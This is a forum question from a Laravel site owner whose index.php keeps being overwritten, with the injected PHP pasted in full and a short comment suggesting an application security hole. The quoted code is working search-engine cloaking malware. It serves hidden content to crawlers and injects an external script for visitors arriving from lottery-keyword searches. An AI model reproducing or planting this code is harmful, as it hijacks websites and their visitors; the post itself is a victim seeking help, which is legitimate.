# 360 Spider Bot Created File in Storage Folder in laravel Project on live site

Tags: laravel, .htaccess, robots.txt

On My Live site Some one upload the file in storage Folder 
even he does not have permission and access to Cpanel or FTP
but always my index.php is over written with some raw code

```
function _spider() {
   $agent = strtolower($_SERVER['HTTP_USER_AGENT']);
   $spiderArr = array('360spider', 'so', 'soso', 'bing', 'sogou', 'sm', 'yahoo');
   foreach($spiderArr as $v) {
       if(strpos($agent, $v) !== false) {
           return true;
       }
   }
   $hostname = strtolower(gethostbyaddr(@$_SERVER['REMOTE_ADDR']));
   $spiderArr = array('sogouspider', 'hn.kd.ny.adsl', 'msnbot');
   foreach($spiderArr as $v) {
       if(strpos($hostname, $v) !== false) {
           return true;
       }
   }
}

function _main() {
   $index = strtolower($_SERVER['SCRIPT_NAME']);
   $indexArr = array('index', 'default', 'home', 'safe');
   foreach($indexArr as $v) {
       if(strpos($index, $v) !== false) {
           return true;
       }
   }
}

function _from() {
   $referer = strtolower(@$_SERVER['HTTP_REFERER']);
   if(empty($referer)) {
       return false;
   } 
   $refeerArr = array('so.com', '360', 'soso', 'bing', 'sogou' ,'sm', 'yahoo');
   foreach($refeerArr as $v) {
       if(strpos($referer, $v) !== false) {
           return true;
       }
   }
}

function _keywords() {
   $referer = strtolower(@$_SERVER['HTTP_REFERER']);
   if(empty($referer)) {
       return false;
   } 
   $refeerArr = array('%C1%F9','%E5%85%AD','%BA%CF','%E5%90%88','%BA%CD','%E5%92%8C','%B2%CA','%E5%BD%A9','%CC%D8','%E7%89%B9','%C2%EB','%E7%A0%81','%BD%B1','%E5%A5%96','%C6%DA','%E6%9C%9F','%D0%A4','%E8%82%96','%CD%BC','%E5%9B%BE','lhc','lhc','%CF%E3%B8%DB','%E9%A6%99%E6%B8%AF','6%BA%CF','6%E5%90%88','%C2%ED%BB%E1','%E9%A9%AC%E4%BC%9A','%CC%D8%C2%EB','%E7%89%B9%E7%A0%81','%C2%DB%CC%B3','%E8%AE%BA%E5%9D%9B','%C1%F9%BA%CF','%E5%85%AD%E5%90%88','%BF%AA%BD%B1','%E5%BC%80%E5%A5%96','%BD%E1%B9%FB','%E7%BB%93%E6%9E%9C','%CD%BC%BF%E2','%E5%9B%BE%E5%BA%93','%D0%C4%CB%AE','%E5%BF%83%E6%B0%B4','%B9%DC%BC%D2%C6%C5','%E7%AE%A1%E5%AE%B6%E5%A9%86','%B0%D7%D0%A1%BD%E3','%E7%99%BD%E5%B0%8F%E5%A7%90','%D7%DF%CA%C6%CD%BC','%E8%B5%B0%E5%8A%BF%E5%9B%BE','%C0%CF%C7%AE%D7%AF','%E8%80%81%E9%92%B1%E5%BA%84','%D4%F8%B5%C0%C8%CB','%E6%9B%BE%E9%81%93%E4%BA%BA','%BF%AA%BD%B1%D6%B1%B2%A5','%E5%BC%80%E5%A5%96%E7%9B%B4%E6%92%AD','%B1%BE%C6%DA','%E6%9C%AC%E6%9C%9F','%D6%B1%B2%A5','%E7%9B%B4%E6%92%AD','%D7%CA%C1%CF','%E8%B5%84%E6%96%99','%CF%D6%B3%A1','%E7%8E%B0%E5%9C%BA','%BC%C7%C2%BC','%E8%AE%B0%E5%BD%95','%B1%A8','%E6%8A%A5','%CD%BC%D6%BD','%E5%9B%BE%E7%BA%B8','%CD%F8%D6%B7','%E7%BD%91%E5%9D%80','%B4%F3%C8%AB','%E5%A4%A7%E5%85%A8','%D0%FE%BB%FA','%E7%8E%84%E6%9C%BA','%D4%A4%B2%E2','%E9%A2%84%E6%B5%8B','%B9%AB%CA%BD','%E5%85%AC%E5%BC%8F','%BA%C5%C2%EB','%E5%8F%B7%E7%A0%81','%B5%D8%CF%C2','%E5%9C%B0%E4%B8%8B','%B9%D2%C5%C6','%E6%8C%82%E7%89%8C','%B2%D8%B1%A6','%E8%97%8F%E5%AE%9D','%C3%E2%B7%D1','%E5%85%8D%E8%B4%B9','%C0%FA%CA%B7','%E5%8E%86%E5%8F%B2','%CC%EC%CF%DF','%E5%A4%A9%E7%BA%BF','%CC%FA%CB%E3%C5%CC','%E9%93%81%E7%AE%97%E7%9B%98','%BA%EC%BD%E3','%E7%BA%A2%E5%A7%90','%D0%C4%BE%AD','%E5%BF%83%E7%BB%8F','%e9%87%91%e5%a4%9a%e5%ae%9d','%bd%f0%b6%e0%b1%a6','%e4%ba%8c%e5%8d%81%e5%85%ad','%b6%fe%cb%c4%c1%f9','%e5%a4%a9%e7%a9%ba','%cc%ec%bf%d5','%e5%87%8c%e6%b3%a2','%c1%e8%b2%a8','%e7%ba%a2','%ba%ec','%e8%93%9d','%c0%b6','%e7%bb%bf','%c2%cc','%e4%ba%94%e8%a1%8c','%ce%e5%d0%d0','%e8%b7%91%e7%8b%97','%c5%dc%b9%b7','%e5%9b%9b%e4%b8%8d%e5%83%8f','%cb%c4%b2%bb%cf%f1','%e4%b8%ad','%d6%d0','mahui','tema','xianggang');
   foreach($refeerArr as $v) {
       if(stripos($referer, $v) !== false) {
           return true;
       }
   }
}

if(_spider() && _main()) {
   @ob_end_clean();
   echo @file_get_contents('./storage/zhuayt.gif');
   echo '<!--'.date('Y-m-d H:i:s').'-->';
   @ob_end_flush();
   exit();
}
if(_keywords()){
   if(_from()){
       @ob_end_clean();
       echo '<script language="javascript" src="https://www.8686pro.com/aa.js"></script><br/>';
       @ob_end_flush();
       exit();
   }
}
header("Content-Type: text/html; charset=gb2312");
```

this code was written in file 
can some one help me

Storage folder have 755 permission
but dont know how he upload it
how can he access my site without FTP

Help Please

Comment: That means somebody is probably able to load custom code someway or another, which could be caused by a security leak in your application.

Comment: Oh Thanks you save me buddy 
i was not aware about this thing